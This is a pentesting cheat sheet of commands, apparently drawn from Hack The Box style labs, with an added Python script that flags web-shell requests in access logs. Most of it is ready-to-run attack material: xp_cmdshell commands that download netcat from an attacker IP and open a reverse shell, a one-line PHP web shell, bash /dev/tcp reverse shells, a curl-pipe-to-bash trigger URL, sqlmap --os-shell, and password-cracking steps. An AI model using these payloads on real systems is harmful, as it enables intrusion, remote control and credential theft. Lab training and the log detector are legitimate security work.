Pentesting tools and useful commands

GTFOBins — list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.

Kali OS

Select Network Repositories

Default:

echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" | sudo tee /etc/apt/sources.list

More stable:

echo "deb http://http.kali.org/kali kali-last-snapshot main contrib non-free" | sudo tee /etc/apt/sources.list

Install all tools:

sudo apt install -y kali-linux-large

Install GUI:

sudo apt install -y kali-win-kex

GUI documentation. Run the GUI (press F8 to exit full-screen mode):

kex --win -s

Wappalyzer — browser extension to see the technologies used on websites.

OpenVPN

sudo openvpn --config vpn.ovpn --daemon

The network interface can be checked by running the ifconfig command in the terminal.

Shutdown

sudo ifconfig tun1 down

Directory search on a site (dirsearch with a SecLists wordlist):

dirsearch -u http://october.metaltech.stf/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt

Responder

sudo responder -I tun0

John the Ripper

Extract the hash from a password-protected zip, then crack it with the same file name:

zip2john backup.zip > hashes
john -w=/usr/share/wordlists/rockyou.txt hashes

Identify possible hashes

hashid 2cb42f8734ea607eefed3b70af13bbd3

Crack hash

hashcat -a 0 -m 0 hash /usr/share/wordlists/rockyou.txt

Pentesting MSSQL

MSSQL Injection Cheat Sheet

Impacket mssql client

impacket-mssqlclient ARCHETYPE/[email protected] -windows-auth
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.17.81/nc64.exe -outfile nc64.exe"
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.17.81 443"

SQL map

sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo'
sqlmap -u 'http://10.129.10.184/dashboard.php?search=asd' --cookie='PHPSESSID=tg7rj9h95j4bb1u3211ti406qo' --os-shell

winPEAS (Windows Privilege Escalation)

linPEAS (Linux Privilege Escalation)

Evil Win Remote

evil-winrm -i 10.129.233.177 -u administrator -p badminton

Nmap

sudo nmap -sV 192.168.1.1

sudo nmap -sV -sC 192.168.1.1

sudo nmap -p- --min-rate 5000 -sV 192.168.1.1

Gobuster

go install github.com/OJ/gobuster/v3@latest
git clone https://github.com/danielmiessler/SecLists.git
gobuster dir --url http://10.129.236.130/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
gobuster dir --url http://10.129.119.70/ --wordlist ./SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

MySQL

mysql -h 10.129.132.32 -u root

SHOW databases; : prints the databases we can access.
USE {database_name}; : switch to the database named {database_name}.
SHOW tables; : prints the tables inside the current database.
SELECT * FROM {table_name}; : prints all rows of the table {table_name}.

SMB

smbclient -N -L \\\\{TARGET_IP}\\

-N : no password (null session)
-L : list the shares and services available on the server

Fully interactive shells

Simple PHP Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Reverse Shell

printf '#!/bin/bash\nbash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1' > shell.sh

Or

bash -c "bash -i >& /dev/tcp/{your_IP}/1337 0>&1"

Start netcat listener

nc -nvlp 1337

Start Web Server

python3 -m http.server 8000

Trigger example (the web shell fetches shell.sh from the web server above and pipes it to bash):

http://thetoppers.htb/shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash
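For the blue-team side of the same procedure, here is an added example (not part of the original cheat sheet) that scans web server access log lines for the web-shell invocation pattern above: URL-decoded query parameters containing a pipe to a shell, /dev/tcp, or a curl/wget download. The log lines are constructed for illustration.

```python
"""Flag web-shell style requests (e.g. shell.php?cmd=curl ...|bash) in an
access log. Added example; the sample log lines below are constructed."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Apache/nginx "combined" format; only IP, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators drawn from the shells shown in this cheat sheet.
INDICATORS = [
    (r'\|\s*(ba)?sh\b', 'pipe-to-shell'),
    (r'/dev/tcp/', 'bash reverse shell'),
    (r'\bcurl\b|\bwget\b', 'remote download'),
    (r'pty\.spawn', 'pty upgrade'),
    (r'\bnc\b|\bncat\b|nc64\.exe', 'netcat'),
]

def inspect_line(line):
    """Return a finding dict for a suspicious request line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m['target'])
    hits = []
    # parse_qsl decodes %xx once; decode again to catch double-encoded payloads.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)
        for pattern, label in INDICATORS:
            if re.search(pattern, decoded, re.IGNORECASE):
                hits.append((name, label))
    if not hits:
        return None
    return {'ip': m['ip'], 'path': parts.path, 'status': m['status'], 'hits': hits}

def scan(log_text):
    """Run inspect_line over every line and keep only the findings."""
    return [r for r in map(inspect_line, log_text.splitlines()) if r]

# Constructed sample: one benign page view, one web-shell trigger, one benign
# search containing the word "bash" (no pipe, so it must not be flagged).
SAMPLE_LOG = """\
10.10.17.81 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.17.81 - - [01/Jan/2024:10:00:02 +0000] "GET /shell.php?cmd=curl%20%3CYOUR_IP_ADDRESS%3E:8000/shell.sh|bash HTTP/1.1" 200 0 "-" "curl/7.88"
10.10.17.81 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?q=bash%20scripting%20tips HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```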

Spawn a functional TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

Upgrade shell

script /dev/null -c bash